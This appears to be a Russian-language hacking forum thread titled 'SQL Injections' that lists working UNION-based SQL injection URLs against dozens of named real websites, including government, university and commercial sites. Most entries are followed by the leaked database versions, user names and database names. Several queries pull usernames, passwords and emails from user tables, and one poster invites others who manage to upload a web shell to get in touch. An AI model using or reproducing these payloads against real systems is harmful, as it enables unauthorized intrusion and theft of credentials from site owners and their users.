SQL Инъекции

Code:

http://ftk.cc.uz/forum.phtml?action=viewMessageInForum&id=-4+union+select+1,2,3,4,concat_ws(user(),version(),database())--

5.0.32-Debian_7etch10-logftm-root@localhostftm-smnp

Code:

http://ftk.cc.uz/forum.phtml?action=viewMessageInForum&id=-4+union+select+1,2,3,4,table_name+from+information_schema.tables--

 

PostgreSQL

PostgreSQL 8.1.17 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

 

Code:

http://www.mollinkdesigns.com/buy.php?id=21+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10+LIMIT+1,1-- 

Database Version: 5.0.32-Debian_7etch10
Database name: mollin_db1
User name: [email protected]

Code:

http://mycartoon.ir/buy.php?id=21+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11+LIMIT+1,1-- 

Database Version: 5.0.67-community
Database name: cddooni_cartoon
User name: cddooni_user@localhost

 

Code:

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,concat_ws(0x3a,ID,UserName,UserPass,UserMail),5,6,7+from+users/*

 

Code:

http://www.divascarlet.it/news.php?id=-9+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9+from+users--

 

Code:

http://www.pentagonusa.com/articles/article_detail.php?ArticleID=-1337+union+select+1,2,CONCAT_WS(CHAR(32,58,32),UserGroupID,UserID,FirstName,LastName,UserName,Password,Email,AccessLevelID,Active),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+Users--

 

Code:

http://www.markettree.co.za/fact_desc.html?fact_det:acode=1+union+select+1,2,3,4,concat(0x3,version(),user(),database()),6,7,8,9,10,11,12+limit+1,1

[email protected]_dev2

 

Общая врачебная практика Свердловской области

ММВБ-Поволжье.Региональный биржевой центр.

Code:

micexpfo_new:micexpfo_new@localhost:5.0.24a

 

5.0.75-log:caramel:[email protected]

 

Code:

http://stihoslov.ru/view.php?id=-39657+union+select+1,2,3,user_loginname,user_password,6,7,8,9,10,11,12%20FROM%20e107_user%20LIMIT%201,1+--+

Code:

http://www.gaztrubplast.ru/news/news1.php?id=-1+union+select+1,2,user%28%29,database%28%29,5,6,version%28%29+--+

version: 4.0.27
database: gaztrub
user: gaztrub@zvm16

 

integrand.nl PR=8!!!!
http://www.integrand.nl/vestigingen-links.php?id=1/**/anD/**/1=-1/**/uniON/**/aLl/**/seLeCT/**/1,version(),3,4,5,6,user(),8,9,null+--+/*
version - 5.0.51a-community-nt
user - integrand.nl@localhost
database - integrand
Tables
forumusers
cms_users (username, password, email)

 

Code:

http://www.hotellepriori.com/index.php?productId=1+union+select+concat(0x3,version(),user(),database())+limit+1,1

5.0.51a-3ubuntu5.4weblogik@localhostsite_lepriori

(вывод в исходнике)

Code:

http://www.dontpaniconline.com/designthepack/theme/?t=1+union+select+concat(0x3,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+limit+1,1/*

5.0.45db12781@localhostdb12781_designaposter

 

Code:

http://www.sarkrolik.ru/biblioteka.php?mode=bib&id=-30+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9--

4.1.22-log:rabbits@localhost:rabbits

ТИЦ: 10
PR: 3

Code:

http://www.paragrafen.no/?id=-30+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

4.1.22-log[email protected]aragrafen

PR: 5

 

[PR=5]

Code:

http://artecapital.net/rockgallery/index.php?id=-8+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6--

artecap_artecapital:5.0.81-community:artecap_arteadmi@localhost

[PR=3]
Странный сайт...

Code:

http://www.punk4dummies.com/interviews.php?id=-20+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8--

db213786537:5.0.45-log:[email protected]

 

Code:

http://www.hjzf.gov.cn/admin/attachment.php?attachmentid=1+union+select+1,2,concat(0x3,version(),database(),user()),4,5,6/*

4.0.27-logsite_hjgovsite_hjgov@localhost

 

obzor,obzor1

 

PR 6
http://home.uprm.edu/hrjobs/showjob.php?id=-330'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,24/*

Database Version: 4.1.12-log
Database name: hrjobs
User name: [email protected]

---------------------------------------------------------------------------------------------------------------

PR 5
http://ing.uprm.edu/events2.php?id=-47+union+select+1,2,3,4,5,6,7,8,9,10/*

Database Version: 4.1.12-log
Database name: pagina_decanato
User name: [email protected]

------------------------------------------------------------------------------------------------------------------------

PR 5
http://oiip.uprm.edu/building.php?id=-132'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,31/*

Database Version: 4.1.12-log
Database name: reabuilding
User name: [email protected]

 

Топ серверов lineage.
http://l2.kiktours.com

Зарегестрированые пользыватели:

PHP:

http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,name,pass),mail+from+l2portal.users--

Зарегестрированые сервера:

PHP:

http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a3a3a3a3a,user,web),server_type+from+l2portal.servers--

Вся БД: (Там БД от нескольких сайтов...)

PHP:

http://l2.kiktours.com/index.php?frame=serverinfo&serverid=1811+union+select+concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME),2+from+INFORMATION_SCHEMA.COLUMNS--

Если у когото получится залить шелл, плиз ПМ.

 

http://www.t-fisi.de/links.php?id=1+anD+1=-1+union+select+1,0,version()
Version = 5.0.51a-24+lenny1
User = web1@localhost
Database = usr_web1_1

Columns: Table bb1_users

Code:

username
	password
	email
	userposts
	groupid
	rankid
	title
	regdate
	lastvisit
	lastactivity
	usertext
	signature
	icq
	aim
	yim
	msn
	homepage
	birthday
	avatarid
	gender
	showemail
	admincanemail
	usercanemail
	invisible
	usecookies
	styleid
	activation
	blocked
	daysprune
	timezoneoffset
	startweek
	dateformat
	timeformat
	emailnotify
	buddylist
	ignorelist
	receivepm
	emailonpm
	pmpopup
	umaxposts
	showsignatures
	showavatars
	showimages
	nosessionhash
	ratingcount
	ratingpoints
	threadview

Columns: Table wp_users

Code:

user_login
	user_pass
	user_nicename
	user_email
	user_url
	user_registered
	user_activation_key
	user_status
	display_name

 

Code:

http://www.emiclassics.com/artistextras.php?aid=1+union+select+concat(0x2a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+limit+1,1/*

[email protected]